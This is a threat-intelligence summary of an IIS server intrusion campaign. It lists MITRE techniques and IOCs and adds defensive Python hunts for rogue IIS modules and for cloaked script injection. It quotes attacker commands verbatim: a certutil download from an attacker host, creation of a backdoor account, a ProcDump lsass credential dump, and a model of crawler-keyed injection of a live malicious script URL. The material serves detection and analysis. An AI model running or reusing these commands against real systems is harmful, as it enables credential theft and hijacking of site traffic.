Keypoints
- Attackers gained access to poorly managed Windows IIS servers and executed reconnaissance commands (ipconfig, systeminfo, whoami) before deploying payloads.
- A Meterpreter backdoor was installed; it connects back to an attacker-supplied IP address and port and executes the shellcode it receives on the server.
- HTran (an open-source port-forwarding tool) was deployed via w3wp.exe to enable proxied remote access, commonly for RDP tunneling.
- Attackers created a persistent local account (net user kr$ test123!@# /add) to maintain access after initial intrusion.
- A malicious IIS native module DLL was registered and hooked into the OnSendResponse handler, modifying HTTP responses to inject an obfuscated script that loads hxxps://ll.olacityviet[.]com/av.js, so that search-portal traffic is served gambling pages.
- ProcDump (run as p.exe) was abused to dump lsass.exe memory (%ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip) to steal credentials for lateral movement.
- Known IOCs include the Meterpreter MD5 d5312ab7f01fd74d399c392effdfe437, the x64 IIS module MD5 ebeb931a6dd91a227225f0ff92142f2b, C2 IP 43.156.50[.]76, and the domains ll.olacityviet[.]com (script loader) and moojukschool[.]com (payload delivery).
MITRE Techniques
- [T1190] Exploit Public-Facing Application – The attackers targeted an “improperly managed domestic Windows Internet Information Services (IIS) web server” for initial access. [‘improperly managed domestic Windows Internet Information Services (IIS) web server’]
- [T1105] Ingress Tool Transfer – Tools and payloads were transferred to the server using certutil to download files (e.g., “certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt”). [‘certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt’]
- [T1219] Remote Access Software – A Meterpreter backdoor was installed and “is executed by receiving the attacker’s IP and port number,” allowing remote command execution and shellcode delivery. [‘meterpreter backdoor is executed by receiving the attacker’s IP and port number’]
- [T1090] Proxy – The HTran port forwarding tool was deployed “through the w3wp.exe process” to forward ports and enable remote access (commonly for RDP). [‘installed the HTran utility through the w3wp.exe process’]
- [T1059] Command and Scripting Interpreter – The threat actor executed native commands and scripts (ipconfig, systeminfo, certutil, curl) during reconnaissance and payload deployment. [‘ipconfig’, ‘systeminfo’, ‘certutil’]
- [T1003] OS Credential Dumping – ProcDump was used to dump lsass.exe memory (“%ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip”) to extract credentials. [‘%ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip’]
- [T1505] Server Software Component – A malicious IIS native module DLL was registered into the web server’s response pipeline, altering HTTP responses and injecting JavaScript aimed at search-portal traffic. [‘malicious code inserted malicious code into the OnSendResponse handler’]
- [T1136] Create Account – A local account was added with net user to retain access after the initial intrusion. [‘net user kr$ test123!@# /add’]
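The techniques above leave two kinds of host artifacts: an extra native module in applicationHost.config, and w3wp.exe spawning recon, download and dump commands. The hunt below is an added example (not code from the ASEC report) that checks both against constructed inputs: a trimmed `<globalModules>` fragment whose third entry, `respfilter64.dll`, is an invented placeholder name, and a handful of Sysmon-style process-creation records that reuse the page's commands. The stock-DLL allowlist is partial and is an assumption; build the real one from a clean reference host. The LSASS rule keys on ProcDump's arguments rather than its file name, since the attacker ran it as p.exe.

```python
"""Hunt for the IIS intrusion chain above: rogue native modules in
applicationHost.config plus w3wp.exe-spawned recon/download/dump commands.
Added example with constructed inputs, not data from the ASEC report."""
import re
import xml.etree.ElementTree as ET

# Defanged IOCs as written on the page; refang() turns them into the form
# that appears in real logs.
IOC_DOMAINS = {"ll.olacityviet[.]com", "jsc.olacityviet[.]com", "moojukschool[.]com"}
IOC_IPS = {"43.156.50[.]76"}

# Assumption: partial allowlist of stock IIS native module DLL names. Build the
# real one from a clean reference host (appcmd list modules / applicationHost.config).
STOCK_INETSRV_DLLS = {
    "loghttp.dll", "compstat.dll", "compdyn.dll", "cachhttp.dll", "static.dll",
    "defdoc.dll", "dirlist.dll", "protsup.dll", "authanon.dll", "authbas.dll",
    "authsspi.dll", "isapi.dll", "filter.dll", "custerr.dll", "modrqflt.dll",
    "iisfreb.dll", "iprestr.dll", "cgi.dll", "urlauthz.dll", "validcfg.dll",
}

# Constructed applicationHost.config fragment. "respfilter64.dll" is an invented
# placeholder for the registered malicious module, not an IOC from the report.
APPHOST_CONFIG = """<configuration><system.webServer><globalModules>
  <add name="HttpLoggingModule" image="%windir%\\System32\\inetsrv\\loghttp.dll" />
  <add name="StaticCompressionModule" image="%windir%\\System32\\inetsrv\\compstat.dll" />
  <add name="ResponseFilter" image="%windir%\\System32\\inetsrv\\respfilter64.dll" />
</globalModules></system.webServer></configuration>"""

# Constructed process-creation records (Sysmon Event ID 1-like fields).
PROCESS_LOG = r"""
parent=w3wp.exe image=cmd.exe cmdline="cmd.exe /c whoami"
parent=w3wp.exe image=certutil.exe cmdline="certutil -urlcache -split -f http://moojukschool.com/msf.txt"
parent=w3wp.exe image=net.exe cmdline="net user kr$ test123!@# /add"
parent=cmd.exe image=p.exe cmdline="C:\ProgramData\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip"
parent=services.exe image=svchost.exe cmdline="svchost.exe -k netsvcs"
"""


def refang(s):
    """Turn a defanged indicator (hxxp, [.]) into the form seen in logs."""
    return s.replace("hxxp", "http").replace("[.]", ".").lower()


def suspicious_global_modules(xml_text):
    """Native modules whose DLL is outside inetsrv or is not a stock IIS DLL."""
    root = ET.fromstring(xml_text)
    global_modules = root.find(".//globalModules")
    findings = []
    for add in (global_modules if global_modules is not None else []):
        image = add.get("image", "")
        norm = image.replace("\\", "/").lower()
        dll = norm.rsplit("/", 1)[-1]
        if "/inetsrv/" not in norm or dll not in STOCK_INETSRV_DLLS:
            findings.append((add.get("name"), image))
    return findings


LINE_RE = re.compile(r'parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"')


def parse_process_log(text):
    """Parse the constructed record format into dicts; skip malformed lines."""
    matches = (LINE_RE.match(line) for line in text.strip().splitlines())
    return [m.groupdict() for m in matches if m]


W3WP_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "curl.exe", "net.exe", "net1.exe"}

# (rule name, predicate). The lsass rule keys on ProcDump's arguments, not its
# file name, because the attacker ran it as p.exe.
RULES = [
    ("w3wp_spawned_shell_or_lolbin",
     lambda r: r["parent"].lower() == "w3wp.exe" and r["image"].lower() in W3WP_CHILDREN),
    ("certutil_download",
     lambda r: re.search(r"certutil(\.exe)?\s.*-urlcache", r["cmdline"], re.I)),
    ("lsass_memory_dump",
     lambda r: re.search(r"-ma\s+lsass(\.exe)?\b", r["cmdline"], re.I)),
    ("local_account_created",
     lambda r: re.search(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", r["cmdline"], re.I)),
    ("known_ioc_in_cmdline",
     lambda r: any(refang(i) in r["cmdline"].lower() for i in IOC_DOMAINS | IOC_IPS)),
]


def hunt_processes(records):
    """Return (rule, cmdline) for every record/rule pair that fires."""
    return [(name, r["cmdline"]) for r in records for name, pred in RULES if pred(r)]


if __name__ == "__main__":
    for finding in suspicious_global_modules(APPHOST_CONFIG):
        print("module:", finding)
    for hit in hunt_processes(parse_process_log(PROCESS_LOG)):
        print("process:", hit)
```

On a live host, feed `suspicious_global_modules` the contents of `%windir%\System32\inetsrv\config\applicationHost.config` and `hunt_processes` the fields from Sysmon Event ID 1 or Security 4688 (with command-line auditing enabled); any module outside the allowlist should then be checked for an Authenticode signature and compared against the reported MD5s.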
Indicators of Compromise
- [MD5] Payload file hashes – d5312ab7f01fd74d399c392effdfe437 (Meterpreter backdoor), ebeb931a6dd91a227225f0ff92142f2b (IIS module x64)
- [IP Address] C2 server – 43.156.50[.]76 (Meterpreter C&C address)
- [Domain] Malicious/redirect domains – ll.olacityviet[.]com (script loader hxxps://ll.olacityviet[.]com/av.js), jsc.olacityviet[.]com
- [Domain] Download host – moojukschool[.]com (used with certutil to fetch msf.txt)
- [Account] Created local account – kr$ (created with the command “net user kr$ test123!@# /add”)
- [File path] Dump command and artifacts – %ALLUSERSPROFILE%\p.exe used to dump lsass.exe to C:\ProgramData\xxx.zip
The attacker flow and technical procedure condensed:
1) Initial access and reconnaissance: The adversary targeted exposed, poorly managed Windows IIS servers, enumerated the host with commands such as ipconfig, systeminfo and whoami, and used certutil to download additional files (e.g., certutil -urlcache -split -f hxxp://moojukschool[.]com/msf.txt). A Meterpreter backdoor was then deployed that connects back to the attacker's IP and port and executes the shellcode it receives, giving remote control.
2) Persistence and remote reachback: Through the Meterpreter session the attacker installed HTran (a port-forwarding tool) via the w3wp.exe process to proxy remote connections (commonly RDP), and created a local account (net user kr$ test123!@# /add) to retain access. They then placed a malicious IIS native module DLL in C:\Windows\System32\inetsrv and registered it, hooking the OnSendResponse event so the malicious routine runs on every response the server sends.
3) HTTP response manipulation and credential theft: The IIS module inspects the User-Agent and Referer headers to identify search-portal crawlers and referrals, and injects an obfuscated script that writes a script tag loading hxxps://ll.olacityviet[.]com/av.js, redirecting portal traffic to gambling pages and stealing cookie data. After installing the module the attacker abused ProcDump (run as p.exe) to dump lsass.exe memory (%ALLUSERSPROFILE%\p.exe -accepteula -ma lsass.exe C:\ProgramData\xxx.zip) and harvest credentials for lateral movement. Noted IOCs: Meterpreter MD5 d5312ab7f01fd74d399c392effdfe437, x64 IIS module MD5 ebeb931a6dd91a227225f0ff92142f2b, C2 43.156.50[.]76, and the domains ll.olacityviet[.]com and moojukschool[.]com.
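Because the module keys its injection on the User-Agent and Referer headers, a site owner looking at the page in a normal browser sees nothing wrong. The example below is added here and is neither the module's code nor the ASEC report's: it models the header-keyed rewrite in a few lines (the crawler/referrer patterns and the insertion point before `</body>` are assumptions, since the report does not give them, and the percent-encoded `document.write` is only a stand-in for the obfuscation) and, beside it, the cloaking check a defender runs: request the same URL as a browser and as a search-portal crawler, diff the `<script>` elements, and report any external host in the crawler-only scripts that is not on the site's allowlist. The loader URL is the report's IOC, written un-defanged so it matches as it would in a real response; the page body, headers and allowlist are constructed.

```python
"""Model of the header-keyed response injection described above, beside the
cloaking check a defender runs against it. Added example; not the module's
code and not the report's. Inputs are constructed."""
import re
from urllib.parse import unquote

# Assumption: the module decides on User-Agent/Referer patterns like these.
# The report says it inspects those headers for search-portal traffic; the
# exact patterns are not given. (Yeti is Naver's crawler.)
PORTAL_UA = re.compile(r"googlebot|bingbot|yeti|daum", re.I)
PORTAL_REFERER = re.compile(r"https?://([\w-]+\.)*(google|naver|daum|bing)\.", re.I)

# Loader URL is the report's IOC. The percent-encoded document.write stands in
# for the real obfuscation, which is not reproduced here.
INJECTED = ('<script>document.write(unescape("%3Cscript src=%22https://ll.olacityviet.com/av.js'
            '%22%3E%3C/script%3E"))</script>')


def module_would_inject(headers):
    """True when the request looks like search-portal traffic."""
    ua = headers.get("User-Agent", "")
    ref = headers.get("Referer", "")
    return bool(PORTAL_UA.search(ua) or PORTAL_REFERER.search(ref))


def model_on_send_response(headers, body):
    """OnSendResponse-style hook: rewrite the body only for portal traffic.
    Assumption: the loader is inserted before </body>; the real insertion
    point is not stated in the report."""
    if module_would_inject(headers) and "</body>" in body:
        return body.replace("</body>", INJECTED + "</body>", 1)
    return body


# Defender side: fetch the same URL as a normal browser and as a portal
# crawler, then diff the <script> elements. A clean server returns the same
# scripts both times; a cloaked one does not.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
HOST_RE = re.compile(r"https?://([^\s/\"'<>]+)", re.I)


def scripts_only_in_crawler_view(normal_body, crawler_body):
    """Script elements the crawler sees that the browser does not."""
    base = set(SCRIPT_RE.findall(normal_body))
    return [s for s in SCRIPT_RE.findall(crawler_body) if s not in base]


def external_hosts(scripts, allowed_hosts):
    """Hostnames referenced by the scripts (after percent-decoding, so the
    encoded document.write trick is seen through) that are not allowlisted."""
    found = set()
    for s in scripts:
        for host in HOST_RE.findall(unquote(s)):
            if host.lower() not in allowed_hosts:
                found.add(host.lower())
    return sorted(found)


def cloaking_report(normal_body, crawler_body, allowed_hosts):
    extra = scripts_only_in_crawler_view(normal_body, crawler_body)
    return {"cloaked": bool(extra), "foreign_hosts": external_hosts(extra, allowed_hosts)}


# Constructed site page and request headers.
SITE_BODY = ('<html><head><script src="/static/app.js"></script></head>'
             '<body><h1>Shop</h1></body></html>')
BROWSER = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/120.0"}
CRAWLER = {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"}
FROM_NAVER = {"User-Agent": BROWSER["User-Agent"],
              "Referer": "https://search.naver.com/search.naver?query=x"}

if __name__ == "__main__":
    normal = model_on_send_response(BROWSER, SITE_BODY)
    for hdrs in (CRAWLER, FROM_NAVER):
        cloaked = model_on_send_response(hdrs, SITE_BODY)
        print(cloaking_report(normal, cloaked, {"shop.example"}))
```

Against a real server, replace the two `model_on_send_response` calls with two HTTP fetches of the same URL (one with a browser User-Agent, one with a crawler User-Agent and a search-portal Referer) and pass the bodies to `cloaking_report`; a non-empty `foreign_hosts` list pointing at the olacityviet domains is direct evidence of this module.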
Read more: https://asec.ahnlab.com/ko/64558